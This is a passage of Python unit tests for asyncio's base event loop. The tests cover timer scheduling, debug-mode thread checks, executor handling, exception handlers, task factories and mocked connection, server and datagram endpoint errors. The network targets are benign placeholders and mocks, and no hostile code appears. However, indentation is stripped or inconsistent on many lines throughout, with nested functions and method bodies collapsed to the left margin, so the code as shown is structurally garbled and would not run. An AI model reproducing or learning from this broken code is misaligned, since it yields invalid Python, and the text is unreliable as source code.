self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
            pass
        loop.set_debug(debug)
        if debug:
            msg = ("Non-thread-safe operation invoked on an event loop other "
                   "than the current one")
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_soon(cb)
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_later(60, cb)
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_at(loop.time() + 60, cb)
        else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
            # wait until the event loop is running
            event.wait()
            try:
                if create_loop:
                    loop2 = base_events.BaseEventLoop()
                    try:
                        asyncio.set_event_loop(loop2)
                        self.check_thread(loop, debug)
                    finally:
                        asyncio.set_event_loop(None)
                        loop2.close()
                else:
                    self.check_thread(loop, debug)
            except Exception as exc:
                loop.call_soon_threadsafe(fut.set_exception, exc)
            else:
                loop.call_soon_threadsafe(fut.set_result, None)
        def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
        # raise RuntimeError if the thread has no event loop
        test_thread(self.loop, True)
        # check disabled if debug mode is disabled
        test_thread(self.loop, False)
        # raise RuntimeError if the event loop of the thread is not the called
        # event loop
        test_thread(self.loop, True, create_loop=True)
        # check disabled if debug mode is disabled
        test_thread(self.loop, False, create_loop=True)
    def test_run_once_in_executor_handle(self):
        def cb():
            pass
        self.assertRaises(
            AssertionError, self.loop.run_in_executor,
            None, asyncio.Handle(cb, (), self.loop), ('',))
        self.assertRaises(
            AssertionError, self.loop.run_in_executor,
            None, asyncio.TimerHandle(10, cb, (), self.loop))
    def test_run_once_in_executor_cancelled(self):
        def cb():
            pass
        h = asyncio.Handle(cb, (), self.loop)
        h.cancel()
        f = self.loop.run_in_executor(None, h)
        self.assertIsInstance(f, asyncio.Future)
        self.assertTrue(f.done())
        self.assertIsNone(f.result())
    def test_run_once_in_executor_plain(self):
        def cb():
            pass
h = asyncio.Handle(cb, (), self.loop)
f = asyncio.Future(loop=self.loop)
executor = mock.Mock()
executor.submit.return_value = f
self.loop.set_default_executor(executor)
        res = self.loop.run_in_executor(None, h)
self.assertIs(f, res)
executor = mock.Mock()
executor.submit.return_value = f
res = self.loop.run_in_executor(executor, h)
self.assertIs(f, res)
        self.assertTrue(executor.submit.called)
        f.cancel()  # Don't complain about abandoned Future.
    def test__run_once(self):
        h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
                                 self.loop)
        h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
        self.assertTrue(9.5 < t < 10.5, t)
        self.assertEqual([h2], self.loop._scheduled)
        self.assertTrue(self.loop._process_events.called)
    def test_set_debug(self):
        self.loop.set_debug(True)
        self.assertTrue(self.loop.get_debug())
        self.loop.set_debug(False)
        self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
            return []
        # logging needs debug flag
        self.loop.set_debug(True)
        # Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
            return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
        handle = None
        processed = False
def cb(loop):
nonlocal processed, handle
            processed = True
            handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
        self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
        self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
        def cb():
            pass
        # Set up one "blocking" event that will not be cancelled to
        # ensure later cancelled events do not make it to the head
        # of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
        for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
        # Add some cancelled events that will be at head and removed
cancelled_count += 2
        for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
        # This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
        # Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will nie be cancelled
not_cancelled_count += add_not_cancel_count
        for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
        for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
        self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
        # expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
        # program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
        # universal_newlines, shell, bufsize must not be set
        self.assertRaises(TypeError,
            self.loop.run_until_complete, self.loop.subprocess_exec,
            asyncio.SubprocessProtocol, *args, universal_newlines=True)
        self.assertRaises(TypeError,
            self.loop.run_until_complete, self.loop.subprocess_exec,
            asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
        # expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
        # universal_newlines, shell, bufsize must not be set
        self.assertRaises(TypeError,
            self.loop.run_until_complete, self.loop.subprocess_shell,
            asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
        self.assertRaises(TypeError,
            self.loop.run_until_complete, self.loop.subprocess_shell,
            asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
            fut.set_result(True)
            1/0
        # Test call_soon (events.Handle)
        with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
                test_utils.MockPattern('Exception in callback.*zero'),
                exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
        # Test call_later (events.TimerHandle)
        with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
                test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
            yield from asyncio.sleep(0.01, loop=self.loop)
            1/0
        # Test Future.__del__
        with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
            fut = None  # Trigger Future.__del__ or futures._TracebackLogger
            if PY34:
                # Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
            else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
                    exc_info=False)
    def test_set_exc_handler_invalid(self):
        with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
            return handle
        self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
                'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
        self.loop.set_exception_handler(None)
        with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
                    'Exception in callback.*zero'),
                exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
        assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
            raise AttributeError('spam')
        self.loop._process_events = mock.Mock()
        self.loop.set_exception_handler(handler)
        with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
                    'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
        _context = None
        class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
                raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
        with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
                'Exception in default exception handler',
                exc_info=True)
        def custom_handler(loop, context):
            raise ValueError('ham')
        _context = None
        loop.set_exception_handler(custom_handler)
        with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
                test_utils.MockPattern('Exception in default exception.*'
                                       'while handling.*in custom'),
                exc_info=True)
        # Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
        with self.assertRaisesRegex(
                TypeError, 'task factory must be a callable or None'):
            self.loop.set_task_factory(1)
        self.assertIsNone(self.loop.get_task_factory())
    def test_set_task_factory(self):
        self.loop._process_events = mock.Mock()
        class MyTask(asyncio.Task):
            pass
@asyncio.coroutine
def coro():
            pass
        factory = lambda loop, coro: MyTask(coro, loop=loop)
        self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
        self.assertTrue(isinstance(task, MyTask))
        self.loop.run_until_complete(task)
        self.loop.set_task_factory(None)
        self.assertIsNone(self.loop.get_task_factory())
        task = self.loop.create_task(coro())
        self.assertTrue(isinstance(task, asyncio.Task))
        self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
            'import asyncio',
            'loop = asyncio.get_event_loop()',
            'print(loop.get_debug())'))
        # Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
        self.assertEqual(stdout.rstrip(), b'False')
        sts, stdout, stderr = assert_python_ok('-c', code,
                                               PYTHONASYNCIODEBUG='')
        self.assertEqual(stdout.rstrip(), b'False')
        sts, stdout, stderr = assert_python_ok('-c', code,
                                               PYTHONASYNCIODEBUG='1')
        self.assertEqual(stdout.rstrip(), b'True')
        sts, stdout, stderr = assert_python_ok('-E', '-c', code,
                                               PYTHONASYNCIODEBUG='1')
        self.assertEqual(stdout.rstrip(), b'False')
def test_create_task(self):
        class MyTask(asyncio.Task):
            pass
        @asyncio.coroutine
        def test():
            pass
        class EventLoop(base_events.BaseEventLoop):
            def create_task(self, coro):
                return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
        task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
        # run_forever() consumes the KeyboardInterrupt and so doesn't log
        # a warning
        @asyncio.coroutine
        def raise_keyboard_interrupt():
            raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
        try:
            self.loop.run_until_complete(raise_keyboard_interrupt())
        except KeyboardInterrupt:
            pass
        self.loop.close()
        support.gc_collect()
        self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
        # Python issue #22429: run_until_complete() must not schedule a pending
        # call to stop() if the future raised a BaseException
        @asyncio.coroutine
        def raise_keyboard_interrupt():
            raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
        try:
            self.loop.run_until_complete(raise_keyboard_interrupt())
        except KeyboardInterrupt:
            pass
def func():
self.loop.stop()
            func.called = True
        func.called = False
        try:
            self.loop.call_soon(func)
            self.loop.run_forever()
        except KeyboardInterrupt:
            pass
        self.assertTrue(func.called)
class MyProto(asyncio.Protocol):
    done = None
    def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
        if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
        assert self.state in ('CONNECTED', 'EOF'), self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
    done = None
    def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
        if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
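# Hedged illustration (not part of the original test suite): how the MyProto
# helper above is meant to be driven by a real event loop; host and port are
# illustrative.
#
#   loop = asyncio.new_event_loop()
#   coro = loop.create_connection(lambda: MyProto(create_future=True),
#                                 'example.com', 80)
#   transport, proto = loop.run_until_complete(coro)
#   loop.run_until_complete(proto.done)  # set in connection_lost()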
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('asyncio.base_events.socket')
def test_create_connection_multiple_errors(self, m_socket):
        class MyProto(asyncio.Protocol):
            pass
        @asyncio.coroutine
        def getaddrinfo(*args, **kw):
            yield from []
            return [(2, 1, 6, '', ('107.6.106.82', 80)),
                    (2, 1, 6, '', ('107.6.106.82', 80))]
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
            raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
        with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@mock.patch('asyncio.base_events.socket')
def test_create_connection_timeout(self, m_socket):
        # Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
            return fut
        self.loop.getaddrinfo = getaddrinfo
        with mock.patch.object(self.loop, 'sock_connect',
                               side_effect=asyncio.TimeoutError):
            coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
            with self.assertRaises(asyncio.TimeoutError):
                self.loop.run_until_complete(coro)
            self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
            yield from []
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
            yield from []
            return [(2, 1, 6, '', ('107.6.106.82', 80))]
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
            return [(2, 1, 6, '', ('0.0.0.1', 80)),
                    (2, 1, 6, '', ('0.0.0.2', 80))]
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
        with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
            if addr[0] == '0.0.0.1':
                err = OSError('Err')
                err.strerror = 'Err'
                raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
            return [(2, 1, 6, '', ('0.0.0.1', 80)),
                    (2, 1, 6, '', ('0.0.0.2', 80))]
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
            local_addr=(None, 8080))
        with self.assertRaises(OSError) as cm:
            self.loop.run_until_complete(coro)
        self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
        self.assertTrue(m_socket.socket.return_value.close.called)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
            if host == 'example.com':
                return [(2, 1, 6, '', ('107.6.106.82', 80)),
                        (2, 1, 6, '', ('107.6.106.82', 80))]
            else:
                return []
        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
            local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
            return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = ()
self.loop._make_ssl_transport = mock.Mock()
        class _SelectorTransportMock:
            _sock = None
            def get_extra_info(self, key):
                return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
            waiter.set_result(None)
            transport = _SelectorTransportMock()
            transport._sock = sock
            return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
        coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
            server_side=False,
server_hostname='python.org')
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
        coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
            server_side=False,
server_hostname='perl.com')
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
        coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
server_hostname='')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(ANY, ANY, ANY, ANY,
                                                         server_side=False,
server_hostname='')
def test_create_connection_no_ssl_server_hostname_errors(self):
        # When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
        # When using ssl, server_hostname may be None if host is non-empty.
        coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
        self.assertRaises(ValueError, self.loop.run_until_complete, coro)
        coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
        self.assertRaises(ValueError, self.loop.run_until_complete, coro)
        sock = socket.socket()
        coro = self.loop.create_connection(MyProto, None, None,
                                           ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_server_empty_host(self):
        # if host is an empty string, use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
            yield from []
def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
        self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = []
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@mock.patch('asyncio.base_events.socket')
def test_create_server_cant_bind(self, m_socket):
        class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
        m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
        self.assertTrue(m_sock.close.called)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
        m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
        self.assertTrue(
            m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_cant_bind(self, m_socket):
        class Err(OSError):
            pass
m_socket.AF_INET6 = socket.AF_INET6
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
        self.assertTrue(m_sock.close.called)
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
        self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop.remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
        self.assertTrue(m_log.error.called)
        self.assertFalse(sock.close.called)
self.loop.remove_reader.assert_called_with(10)
        self.loop.call_later.assert_called_with(constants.ACCEPT_RETRY_DELAY,
                                                # self.loop._start_serving
                                                mock.ANY,
                                                MyProto, sock, None, None)
